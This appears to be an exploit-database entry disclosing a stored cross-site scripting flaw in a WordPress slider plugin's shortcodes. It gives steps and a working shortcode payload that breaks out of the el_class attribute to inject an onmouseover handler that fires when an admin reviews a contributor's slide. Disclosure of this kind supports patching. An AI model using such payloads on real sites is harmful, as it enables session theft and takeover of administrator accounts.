Share
## https://sploitus.com/exploit?id=WPEX-ID:C430B30D-61DB-45F5-8499-91B491503B9C
1. As a contributor, go to "Swift Slider > Add New Slide"
2. In the "Content > Caption Text" add the POC: `[spb_boxed_content element_name="red" title=""test" box_link="red"" box_link_target="self" el_class='red" onmouseover="alert(/XSScontrib5/)"' width='1/1' el_position="first last"]test content[/spb_boxed_content]`
3. When an admin approves the slide, the XSS will be seen.

Note: Other shortcodes throughout the plugin are vulnerable to the same issue.